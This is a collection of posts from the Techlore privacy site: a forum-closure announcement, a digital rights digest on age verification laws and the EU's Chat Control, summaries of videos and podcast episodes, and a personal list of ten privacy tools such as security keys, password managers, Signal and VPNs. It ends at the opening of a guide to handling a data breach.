newsletter):** [Get all our content delivered directly](https://techlore.tech/#/portal/signup) 👉 **YouTube livestream Q&As:** Every week—resuming in a few weeks after this transition 👉 **YouTube/PeerTube comments:** Engage directly with every video 👉 **Signal group:** For our Techlorians who want real-time discussion And while we can't manage our own forum, we encourage you to explore other privacy-focused communities that align with your interests. Our resources page at [privacytools.techlore.tech](https://privacytools.techlore.tech/) lists projects and tools we trust. ## Forum data & privacy Your forum data will be **automatically deleted on June 1, 2026**. We encourage everyone to let this happen automatically, no action is needed. **However, i**f you want to anonymize your account sooner, or download your personal data, you can do so here: - `discuss.techlore.tech/u/YOUR-USERNAME/preferences/account` (*replace YOUR-USERNAME with your forum username)* **We have thousands of users and are working hard to make this transition smooth. If we miss anything,** [**just let us know!**](https://techlore.tech/contact/) ## Paid members (Techlorians) Your subscription migrated to Ghost automatically. **Nothing changes with billing**—same Stripe, same price, same perks. Just log in at [techlore.tech](https://techlore.tech/) with your same forum/Techlorian email (magic link, no password). **Your membership includes all Ghost features plus your existing perks:** Signal group access, priority livestream Q&As, early access to content, and more. ## What's next for Techlore This consolidation means **doing more of what matters:** - **More videos:** 8-10+ per month (up from 6-8) - **Consistent Surveillance Report:** 4 episodes/month with deeper analysis - **Advocacy work:** Fighting Chat Control, age verification, VPN bans - **Techlore Talks:** Catching up on expert interviews - **Weekly livestreams:** Resuming soon - **Techlore Clips:** Our clips channel resuming - **Go Incognito v2:** Major course updates coming - **Nextcloud series:** Finishing this by popular demand - **Dedicated resource tools:** Proper standalone websites ## A final word I know change is hard, especially when it means losing a community space. If the forum mattered to you, I'm genuinely sorry we couldn't sustain it in a way that served everyone well. But I'm also excited, really excited, about what this consolidation enables. More content. Sharper advocacy. And a more sustainable path forward for the mission that brought us all together in the first place: fighting for digital rights and empowering people to take control of their digital lives. Thank you for being part of this journey. I hope you'll join us here at our new home. And thank you everyone for making what we're doing possible. The fight continues! **Henry & The Techlore Team** ### Encryption Without Software (iStorage datAshur PRO+C Review) URL: https://techlore.tech/encryption-without-software-istorage-datashur-pro-c-review/ Last updated: 2025-12-09T00:24:23.000Z The iStorage datAshur PRO+C is a hardware-encrypted USB-C flash drive that requires a PIN to unlock - no software needed. In this review, we test this security device to see if it's worth it for protecting sensitive data across all operating systems without any drivers or apps. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv/w/7bPpnKQVbqAKZotV3fVGbQ) ### Digital Rights Digest | Dec 1-7 URL: https://techlore.tech/digital-rights-digest-dec-1-7/ Last updated: 2025-12-08T01:12:16.000Z ## On Our Radar 🎯 **Missouri's Age Verification Law Is Surveillance Infrastructure Disguised as Child Safety** On November 30th, [Missouri became the latest US state](https://www.techradar.com/vpn/vpn-privacy-security/missouri-to-enforce-mandatory-age-verification-in-three-days) to enforce mandatory age verification for any website with more than 33% "adult content." The result? VPN searches spiked 4x overnight, major adult sites blocked the entire state rather than collect IDs, and reports are already rolling in that the law is age-gating far more than intended. This also marks the 25th state in the USA to pass age verification laws. The law requires platforms to verify age using government IDs, digital identity systems, or "transactional data"—with fines up to $10,000/day for non-compliance. It even mandates that Apple and Google build age verification tools into their operating systems. The problem? Those systems don't exist yet, and even if they did, they'd create a massive risk of sensitive identity data tied to your browsing habits. Missouri claims websites must "use reasonable methods" to secure data and not retain identifying information, but we've seen this play out before. In the UK, Discord's third-party age verification service was hacked, leaking over 70,000 government ID photos. There's no reason to believe Missouri's patchwork of compliance methods will be any more secure. And here's the broader concern: This is a "copy-paste" law. Nearly identical bills are passing state-by-state, building a national infrastructure where proving your identity to access legal content becomes normalized. Today it's adult sites. Tomorrow it's social media, encrypted messaging, VPNs, or anything deemed "harmful." We also don't have any evidence this works. The people this law claims to protect—minors—will just use VPNs, Tor, or offshore sites with zero protections. Meanwhile, adults are forced into a surveillance system that exposes their identity, browsing habits, and preferences to data breaches, government requests, and corporate profiling. **What you can do:** If you live in Missouri (or any state with similar laws), use a reputable VPN to protect your privacy. Avoid sketchy "free VPN" apps flooding search results. And if you care about pushing back on these laws, support organizations like EFF and the Internet Society fighting age verification mandates in court. And don't forget to contact your representatives! --- ## Bits & Bytes 🤖 **\~** [**India pulls mandate to preinstall government app on smartphones**](https://techcrunch.com/2025/12/03/after-intense-backlash-india-pulls-mandate-to-pre-install-government-app-on-smartphones/) After intense backlash, the Indian government has withdrawn its plan to mandate preinstalled government safety apps on all smartphones. The app would have requested nearly every possible phone permission. While the mandate has been partially rolled back, the situation continues to develop. **Our take:** *This was surveillance disguised as safety. The fact that they attempted it at all shows the playbook: normalize invasive government software under the guise of protection, hope no one notices the permissions. Fortunately, they backed down, but this is still unfolding.* **\~** [**EU's Chat Control Still Has Glaring Problems**](https://www.patrick-breyer.de/en/reality-check-eu-council-chat-control-vote-is-not-a-retreat-but-a-green-light-for-indiscriminate-mass-surveillance-and-the-end-of-right-to-communicate-anonymously/) After much back & forth, the mandatory scanning of Chat Control seems mostly beat, but there are many lingering problems covered by Patrick Breyer. The new propositions can still enable scanning and do nothing to combat age verification requirements. **Our take:** *Following Chat Control is a complete mess for us. It's a mix of live updates from Mastodon, waiting for something more formal from Patrick Breyer, and then seeing how long those updates are still relevant. From where I'm standing, Chat Control should still be fought as hard as it was. Its current state is still a huge hit to digital freedom.* **\~** [**Your Fecal Scanning Toilet Camera Doesn't Actually Have E2EE**](https://varlogsimon.leaflet.pub/3m6zrw6k2bs2p) A researcher decided to investigate if the 'end to end encryption' claims of Kohler, a fecal health tech company, was actually legitimate. They discovered that while they implement encryption at risk and in transit (HTTPS) — they do not integrate true end to end encryption, which would otherwise prevent them from accessing user data. **Our take:** *The craziest part of this story (besides the whole scanning poop thing) is that this isn't the first time a company has confused HTTPS with 'end to end encryption' — Zoom did the same thing back in 2021 where they misled people into thinking they were getting E2EE.* --- ## This Week on Techlore 📺 We covered Missouri's age verification and what it means for the rest of the US in a video outlining the repercussions of these laws: [25 States Now Require Your Government ID OnlineAge verification laws in 25 USA states now require government ID to access parts of the internet—but they’re already backfiring. Learn how these regulations harm real people, while failing to protect children. Plus: what you can do about it. Watch on Techlore.TV for an ad-free, surveillance-free viewing experience![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-17.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/US-age-verification5.png)](https://techlore.tech/25-states-now-require-your-government-id-online/) This week's Surveillance Report was a deep dive on many of the stories shared in this digest: [How India’s Unremovable App Mandate Failed Within DaysTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-16.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/SR247.png)](https://techlore.tech/india-backs-down-from-forced-phone-app/) --- ## Action Item ✅ Contact your representatives! Age verification laws are being proposed globally—from the US, to Canada, to the EU, to Australia, and more. Familiarize yourself with all of your representatives, and take 10 minutes to communicate your concerns with these laws being proposed. ### 25 States Now Require Your Government ID Online URL: https://techlore.tech/25-states-now-require-your-government-id-online/ Last updated: 2025-12-07T23:39:28.000Z Age verification laws in 25 USA states now require government ID to access parts of the internet—but they're already backfiring. Learn how these regulations harm real people, while failing to protect children. Plus: what you can do about it. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv/w/hF76f1sstH3eermJg6Avp7) ### How India's Unremovable App Mandate Failed Within Days URL: https://techlore.tech/india-backs-down-from-forced-phone-app/ Last updated: 2026-04-07T23:19:34.000Z This week's Surveillance Report covers India’s attempt to mandate a potentially invasive app on everyone’s phone, Chat Control updates in the EU with concerns still evolving, half of US states now being age verified, more AI Slop, butt to cloud encryption, and more! *Correction: One of you caught my mistake! The poopinator device is $600 \*with\* a monthly subscription. Sorry about that!* **⏱️ TIMESTAMPS** 00:00 Welcome to Surveillance Report 00:41 Highlight: India's Invasive App 08:28 Some Quick Announcements 09:50 Chat Control Updates 14:19 USA Age Verification 19:44 Our Sponsor: Easy Opt Outs! 21:04 AI Slop Continues 25:48 Butt To Cloud (B2C) 32:38 Defense Bulletin 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [RSS app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Sources ****Highlight** - - - - - ****Chat Control Isn’t Over** - - ****Half of the US is Age Verified** - - [https://assets.freespeechcoalition.com/documents/MO AV Rule.pdf](https://assets.freespeechcoalition.com/documents/MO%20AV%20Rule.pdf) - - ****AI Slop** - - ****Butt to Cloud Encryption** - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ### Microsoft's AI Disaster Just Got Worse URL: https://techlore.tech/microsofts-ai-disaster-just-got-worse/ Last updated: 2026-04-07T23:19:19.000Z This week's Surveillance Report covers Microsoft's AI Disaster getting worse on multiple levels as well as Google's AI, Malware is stealing E2EE messages from people all around the world, updates to Chat Control & other EU regulations, and more! **⏱️ TIMESTAMPS** 00:00 Welcome to Surveillance Report 00:30 Highlight: Microsoft AI Nightmare & Others 15:04 Some Quick Announcements 17:35 Stealing Messages from Signal, WhatsApp & Telegram 21:53 Support Techlore ❤️ 23:18 Chat Control Updates 27:42 Airdrop for Everyone 28:33 Data Breaches & Updates! 34:16 Final Words! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [RSS app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Sources ****Highlight** - - - - - - - - - - - - - - ****Malware Stealing E2EE Messages** - - ****Chat Control** - - - ****EU Regulations Bring More Goodies** - ****Data Breaches & Updates** - - - - - - - - - - - - - - - - ### How Hackers Read Your Signal, WhatsApp & Telegram Messages URL: https://techlore.tech/how-hackers-read-your-signal-whatsapp-telegram-messages/ Last updated: 2025-11-25T16:43:10.000Z Your encrypted messages are secure, but your device might not be based on some new research. This is how the Sturnus Android malware actually steals WhatsApp and Signal messages without breaking encryption, plus the practical steps you can take today to protect yourself. Check your accessibility permissions now—I'll wait. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv/w/ckXp7Sj2sxqgL17mgjQgsP) ### Big Tech Alternatives on Sale This Black Friday URL: https://techlore.tech/big-tech-alternatives-on-sale-this-black-friday/ Last updated: 2025-11-25T16:42:09.000Z Black Friday doesn't have to compromise your values. I personally vetted every digital rights service on our resources list to bring you only deals worth getting in 2025\. Remember: only buy what you need—not because it's on sale. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv/w/s1xqx9SU2TVvy6yicV6MqH) ### Why This Security Expert Doesn't Use a Phone (Buskill Interview) URL: https://techlore.tech/why-this-security-expert-doesnt-use-a-phone-buskill-interview/ Last updated: 2026-04-07T23:23:46.000Z Even with encryption and 2FA, if someone steals your logged-in laptop, you're compromised. Michael Altfield created Buskill - an open source USB "dead man switch" - to solve this analog attack vector. In this interview, you’ll hear about the real incidents that inspired it, the advocacy work that fueled it, and the collaborative engineering efforts that turned it into a practical tool for protecting sensitive data. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [RSS app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Sources • ### WhatsApp Leaked 3.5 Billion Phone Numbers URL: https://techlore.tech/whatsapp-leaked-3-5-billion-phone-numbers-surveillance-report/ Last updated: 2026-04-07T23:18:28.000Z This week's Surveillance Report covers WhatsApp's massive phone number enumeration flaw that exposed 3.5 billion users' data through poor rate limiting - potentially the largest data exposure in history. I also examine Google's new Android sideloading restrictions threatening open app distribution, the EU's concerning Digital Omnibus proposal that could significantly weaken GDPR protections, and disturbing attempts in Wisconsin and Michigan to ban VPN usage under the guise of age verification. **⏱️ TIMESTAMPS:** 00:00 Welcome to Surveillance Report 245 00:29 WhatsApp's Phone Number 'Leak' 06:08 Surveillance Report Back @ Techlore Announcement 08:01 Google's Attacks on Android Freedom 12:48 EU Saga Part 1: Chat Control 15:56 EU Saga Part 2: Digital Omnibus 20:22 Our Sponsor: EasyOptOuts! 21:50 EU Saga Part 3: Cookies Finally Crumble! 23:28 WhatsApp Interoperability Now Live 26:26 USA's VPN Ban 29:48 Cloudflare Outage 30:50 Data Breaches & Service Updates 34:18 Our Sponsor: EasyOptOuts! 34:56 Final Words! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [RSS app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Sources ****Highlight** - - ****Google’s ‘Sideloading’ Saga** - - - - ****Chat Control** - - - - - - ****Digital Omnibus** - - ****Cookie Crumble** - ****WhatsApp Interopability** - ****Winsconsin’s VPN Ban** - ****Cloudflare Outage** - - ****Data Breaches & Updates** - - - - - - - - - - - - - - - - ### The Email Provider Google Doesn't Want You to Know About (Fastmail Interview) URL: https://techlore.tech/the-email-provider-google-doesnt-want-you-to-know-about-fastmail-interview-techlore-talks/ Last updated: 2026-04-07T23:23:33.000Z Ricardo Signes, Chief Engineer at Fastmail, explains why Gmail's email experience has become increasingly fragmented, and what it would take to actually fix the decades-old IMAP protocol that powers most of the internet. We dive deep into JMAP (the modern replacement Gmail won't adopt), privacy-by-design vs. encryption, and the hidden trade-offs between convenience and security that no one talks about. If you've noticed your email client feeling broken, this interview reveals why. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [RSS app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Sources • Fastmail: • Fastmail Values Statement: • Cyrus IMAP/JMAP Server (open source): • JMAP Standard (RFC 8620): • Web Push Standard (RFC 8030): • Signal (for encrypted messaging): • Fastmail Data Transparency Report: ### America's First VPN Ban: What Comes Next? URL: https://techlore.tech/americas-first-vpn-ban-what-comes-next/ Last updated: 2025-11-25T16:38:38.000Z US states including Wisconsin (AB105/SB130) and Michigan are pushing to ban VPNs as part of age verification laws that compromise digital privacy for everyone. This video explains why these bills are technically impossible to implement, threaten journalists and abuse survivors who rely on VPNs, and mirror censorship tactics. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv/w/uZqzNFZQojnfETTah89dpj) ### The "Digital Omnibus" Is Here: Protect Your Data Now URL: https://techlore.tech/the-digital-omnibus-is-here-protect-your-data-now/ Last updated: 2025-11-25T04:25:50.000Z In four days, the EU Commission releases the Digital Omnibus, a proposal to "simplify" GDPR that would actually weaken privacy protections on many fronts: narrowing personal data definitions, giving AI companies blanket access to sensitive data, eliminating employee and journalist protections, and enabling remote device access without consent. In this video, we break down what's changing, why it matters globally, and exactly what you can do to fight back. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv/w/7f8RTRgyu4o7kwig8EjwYk) ### Why Google Chrome Betrays Your Privacy (Firefox CTO Interview) URL: https://techlore.tech/why-google-chrome-betrays-your-privacy-firefox-cto-explains/ Last updated: 2026-04-07T23:23:22.000Z When you sign into Chrome, Google collects your entire browsing history to build behavioral profiles for targeted ads. In this interview, Firefox CTO Bobby Holley breaks down why Mozilla maintains Gecko as an independent engine, how Firefox approaches privacy differently from Google and Apple, and why the stakes for browser independence are higher than ever. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [RSS app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Sources - [https://www.firefox.com/](https://www.firefox.com/en-US/) ### 10 Privacy Tools I Can’t Live Without URL: https://techlore.tech/10-privacy-tools-i-cant-live-without/ Last updated: 2025-11-25T02:26:09.000Z Data is the new oil, and taking your privacy and security seriously is one of the best things you can do to tackle the issue. Normally, I create [resources](https://techlore.tech/resources) to help people figure out what they need to take to reclaim control of their data, but today I wanted to share 10 of the tools I use in *my* daily life! Hopefully it sparks some ideas for you, or maybe this is all just an excuse for me to talk about myself. **Disclosure: Some links below use affiliate links (✧) as a way to support our site!** ## 1\. Multifactor Authentication 🔑 The first tool(s) I use are both multifactor authentication (MFA) methods. In the unfortunate event my email and/or password are breached, MFA is a second verification step to help protect my data from threat actors. I use two MFA methods for most of my accounts, beginning with security keys. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2025/11/image.png) ### Security Keys (Yubikey) I made a [video](https://youtu.be/8Y77o23q%5Ftg) on security keys and why I switched to them. In short: - They are extremely secure - They help prevent phishing attacks - They're super convenient! - They make me feel cool in public [Yubikey✧](https://amzn.to/3XrAm9S) is who I went with given their solid reputation. There are a few other notable security keys like OnlyKey, SoloKeys, and Nitrokey—but Yubikey is what worked best for me. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2025/11/image-1.png) ### TOTP Application (Ente Auth) As much as I love my security keys, not every account supports security keys...leaving me with my second core MFA option: TOTP Applications. These offer: - Good security (But not quite as strong as security keys) - Flexibility between devices - Broader support compared to security keys - Free! Unlike security keys you need to purchase Right now my personal favorite app is [Ente Auth](https://ente.io/auth/) because it's: - Cross-platform for every major operating system - Open source - Gives you the choice to either use it completely offline, or with its built in E2EE sync. - Has an active and passionate team Both of these multifactor authentication options improve my security without sacrificing *too* much convenience 😄 ## 2\. Password Manager 🔏 ![Screenshot 2024-10-09 at 20](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/03.webp) My password manager is another tool that I use daily, if not hourly. Password managers: - Encourage strong, unique passwords - Offer peace-of-mind in having to remember passwords - Can include extra privacy & security features to move the needle further I used to use KeePass, and while it's still one of my favorite password managers due to its security and customization, I was getting tired of needing to maintain it. KeePass is offline by default and requires DIY effort to sync with most of its clients. Additionally, there's no *(quality)* cross-platform client at the time of writing, requiring users to pick & choose different KeePass clients across mobile and desktop operating systems. These concerns led to me exploring other options. I [made a video](https://youtu.be/CLwg552vhlM) covering that journey, but to keep it short it led to [Proton Pass.✧](https://go.getproton.me/SH12Q) Which: - Is open source - Is cross-platform - Integrates nicer with operating systems than most KeePass clients - Has a reliable browser extension *(@ every KeePass client that wasted hours of my life trying to make their extension work properly!)* - Handles E2EE syncing - Includes email aliasing *(more on this later)* - Has a great interface! While KeePass and Proton Pass are my favorite password managers, I think it's important to mention that Bitwarden and 1Password are two more options many people around me also enjoy, I just didn't love their user experiences. No matter what, the most important thing is for people to use unique, secure passwords. And as long as you're using a reasonably secure password manager—you're well ahead of the average person. ## 3\. Privacy Screen Protector 👀 ![10 Privacy Tools I Cannot Live Without-0003 Large](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/10-privacy-tools-i-cannot-live-without-0003-large.webp) If you've never seen one of these...what [privacy screen protectors✧](https://amzn.to/3NFAv6i) do is they restrict the ability to view your device's screen from side angles. While there are concerns like shoulder-surfing attacks *(when someone looks over your shoulder to view your sensitive information)*, my reasoning for using one is for general peace of mind. I hate having strangers looking at what I'm doing on my phone, and these screen protectors make me feel like I have more privacy in public. Worth every penny, and it protects my screen! ## 4\. E2EE Messenger 💬 ![10 Privacy Tools I Cannot Live Without-0004](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/10-privacy-tools-i-cannot-live-without-0004.webp) Communication! I use a variety of messengers for different purposes, but my main messenger is [Signal](https://signal.org/) for the following reasons: - Signal is backed by leading experts - Signal is FOSS & E2EE - Signal supports usernames, allowing communication without revealing a phone number - Signal collects little metadata - Signal is court-proven and transparent with data they can & cannot protect - Signal has well-designed, functional clients for all major devices with audio & video calls - Signal supports disappearing messages, which are automatically set to 4 weeks for everyone I chat with Are there more privacy & secure messengers out there? Maybe! Actually, certainly. Are they as usable and accessible as Signal? None that I've tried. For me, the balance Signal strikes between usability and safety is top notch. The way I see it: What's the point of an ultra-secure messenger if I can only convince a few people to use it? I'd rather have something that's nearly as safe but more accessible to the general population. With that said, I just recently made a [Signal Hardening Guide](https://youtu.be/DPjg3651oJM) for those of you who want to maximize what's possible with Signal's security. ## 5\. NAS 📁 ![10 Privacy Tools I Cannot Live Without-0005](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/10-privacy-tools-i-cannot-live-without-0005.webp) Storing data is tricky. The options generally come down to: - Utilizing cloud providers to backup and sync data between devices - Manually doing it locally I've tried both of these options. Going the cloud route meant I handed over too much trust to companies that deserved none. And the more secure, E2EE options tended to lack in usability. On the other hand, going the manual route meant I consistently felt disorganized and a lot of my time was being poured into tasks I would rather not worry about. Enter the NAS. A NAS stands for **network attached storage** and it was the middle-ground I've always wanted. The NAS allows me to centralize my data to one place, dodging the need to sync data between all my devices. But the magic is it's still local. The data lives at home with hard drives I can touch with my own two hands! The same ones snacking on carrots🥕 as I type this. With that said, it's a middle-ground! It's still not as easy and convenient as using a cloud provider. And Synology's suite, while decent, does not beat popular suites like Google from a usability perspective. Regardless, it's become an invaluable tool that I can't live without. ## 6\. VPN 🛜 ![Screenshot 2024-10-09 at 20](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/31.webp) A *lot* of misinformation exists around VPNs. Before touching on privacy, I want to expand on an issue with the NAS: A NAS is fantastic on your local network. Devices can speak to each other easily and everything feels integrated. When you leave your home network though, you'll no longer be able to connect to your NAS by default. Many people open ports on their network to connect remotely, but this can be risky for security. The solution? A VPN. Tailscale allows me to remotely connect to my NAS from anywhere in the world. Seriously...I was in Europe not too long ago and was connecting to the NAS everywhere I went via Tailscale! > 'But Henry....this isn't a privacy tool!' You're right! Not inherently. Fortunately, Tailscale partnered with Mullvad, one of the most reputable VPNs in the industry. This integration means I'm both able to connect to my NAS remotely and gain the protection of Mullvad, all through the same VPN connection! While [VPNs are oversold](https://youtu.be/u-uj%5FdLXu5s), they still offer some privacy benefits that people should understand before choosing to get one. We have an [open source VPN chart](https://www.techlore.tech/vpn) to help you understand the pros and cons of every VPN. For Tailscale users, Mullvad is a no-brainer. ## 7\. Browsers 🧑‍💻 I think browser wars are [silly](https://youtu.be/1eRlAbyjKfU) because there's no good reason to not use multiple browsers and lean into their various strengths. My two core browsers are: ![Screenshot 2024-10-09 at 20](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/22.webp) #### Mullvad Browser My default browser is Mullvad Browser. Mullvad Browser is their official collaboration with the Tor Project. It's essentially Tor Browser without the Tor Network, instead encouraging users to use Mullvad VPN. The goal is to offer a middle-ground between your typical browser and Tor Browser. Note: Mullvad Browser is a disposable browser, so it will not save your browsing history on exit. This makes it a fantastic option for my default browser when I click random links that I don't want to be mixed with my personal web traffic. Overall, it's a fantastic browser for maximizing privacy without sacrificing *too* much convenience. ![10 Privacy Tools I Cannot Live Without-0006](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/10-privacy-tools-i-cannot-live-without-0006.webp) #### Brave Browser It's familiar, fast, 'just works', cross-platform, and is actively maintained with a solid team. I do, however, dislike how bloated it is by default, as well as the archaic takes of their CEO. Within my workflow, I use Brave's profiles for my account-based browser usage between different projects. This is how I'm able to manage 3 different Mastodon accounts, 7 different YouTube channels, etc. *(I have too many accounts to manage)* --- The way I use both browsers is the following: - Mullvad is the default browser, so any links I click automatically open in a browser designed to be non-personal, and wipe data on exit. - When I need to check a specific account, I open Brave in its respective profile and use the browser for those accounts. With this workflow, I'm able to reap the benefits of two browsers with fewer drawbacks to my workflow! ## 8\. Extensions 🙅 ![Screenshot 2024-10-09 at 20](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/34-1.webp) Extensions can increase your attack surface, make you more unique when you browse, and increase the chances of you installing something malicious in your browser. However, there is one extension that is a no-brainer: **uBlock Origin** [uBlock Origin](https://ublockorigin.com/) is not just an ad-blocker. It's a tracker blocker, a security enhancer, and even a usability extension to make the web more tolerable. *(ex. It can hide every cookie popup and opt you out automatically!)* Most people probably don't need to install uBlock Origin in Brave as it already includes its own feature: Brave Shields. As for Mullvad Browser...it already comes with uBlock Origin by default! When I use other browsers, the first thing I do is install uBlock Origin. It substantially improves the amount of safety in something like Chrome without even needing to customize the extension—install and forget it. This is why installing uBlock Origin on my friends' instances of Chrome is one of the most common things I do for them. And most of them love it since it makes browsing faster and less annoying! The only issue is uBlock Origin doesn't exist for Safari. That's where [AdGuard](https://adguard.com/) is a pretty solid replacement for any of you in Apple's ecosystem. ## 9\. Aliasing 🕵️‍♀️ ![pexels-hikaique-36675](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/pexels-hikaique-36675.webp) Aliasing is the primary way I protect my personal information from countless websites. Aliasing means I put my trust in a single party to no longer have to trust others. I use three core aliasing tools: #### Proton Pass Email Aliasing [Proton Pass✧](https://go.getproton.me/SH12Q) *(my password manager)* includes email aliasing. This means every account I open online receives its own unique email alias. This requires trust in Proton, but it means that any data breach or person who sells access to my email can only do so for an email used for the respective account. #### MySudo Phone Aliasing [MySudo](https://mysudo.com/) offers phone aliasing, enabling me to generate multiple phone numbers for different use-cases. While it won't allow you to register for every account online *(many services can recognize it's a virtual number)*, it still allows me to compartmentalize my phone numbers for select accounts and for people I communicate with. I don't want my doctor to have the same phone number as my family members. #### Privacy.com Card Aliasing The last aliasing tool I use is [privacy.com✧.](https://app.privacy.com/join/WYZ3N) They allow me to generate cards for every merchant I shop at online. I never have to trust a site with my debit card anymore! Privacy.com even supports burner, one-time cards, and besides being great for privacy, it's a fantastic tool for usability! It allows me to close cards for free trials before they charge me, it lets me set max limits on each card to prevent someone over-charging me, and it allows me to send a card number to family or friends without needing to share my actual card number. It's just an incredible tool I can't live without and I wish it was available to more than just the US market so other people could experience it too. --- When I put all three tools together, I am left with a situation where most services receive little to no directly identifying data about me. It means most data breaches don't really phase me. It also improves usability; if I start getting spam to one of my email aliases, I just delete the alias and migrate the account to a new alias. Having multiple phone numbers means I also get less spam and can turn off things like phone calls depending on the number. And I already covered the numerous privacy.com benefits for my finances, and that doesn't include the fact I get 1% cashback with all my privacy.com transactions! ## 10\. DNS 🚥 ![Screenshot 2024-10-09 at 20](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/55.webp) Yes I'm going to lean into cliches...DNS is like a phone book for the internet, allowing you to type a domain like 'techlore.tech' and not have to memorize the actual IP address of the site. The DNS provider you use has a lot of insight into your web traffic. I use [NextDNS✧](https://nextdns.io/?from=5v4be7mt), which automatically checks every domain I access to check if its safe. It allows me to use custom blocklists to block things like ads, trackers, telemetry and more on any device using NextDNS—and it can be configured on a network level! This means you can even gain some privacy protections on IOT devices. This is another area where Tailscale is glorious, since it allows me to use a custom DNS provider like NextDNS. So with just a single VPN connection: - I can access my NAS - All my traffic is routed through Mullvad VPN - All my traffic is being filtered through NextDNS There are many alternatives to NextDNS, most notably [ControlD](https://controld.com/)—but I have yet to test it myself. There are also tools like a [Pi-hole](https://pi-hole.net/) that can achieve similar things on your network. ## Conclusion Those are my 10 privacy tools I can't live without and if you take one of them away from me I'm going to be pretty pissed off! *(this was the metric I used to pick these)* I get countless questions on a daily basis about what I use, so I hope that sharing the tools I use literally every day offered some insight! I hope the takeaway message from this post is that a lot of this is super personal preference. There were probably things I covered that didn't even apply to you, and there are things you're using you might think I'm insane for not utilizing. Well, that's the beauty of privacy. It means something different to everyone. Just make the decisions you feel are best for yourself and go enjoy yourself. ### What to Do After a Data Breach: A Complete Guide URL: https://techlore.tech/what-to-do-after-a-data-breach-a-complete-guide/ Last updated: 2025-11-25T02:41:01.000Z You probably found yourself here because of a data breach. Whether you want to prevent one or you were caught in one you’ve come to the right place. This blog is broken down into three sections: ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2025/11/data-breach-aftermath-0002-1.webp) 1. Figuring out what data was exposed 2. Going through remediation steps for each data point 3. Preventing this from happening again 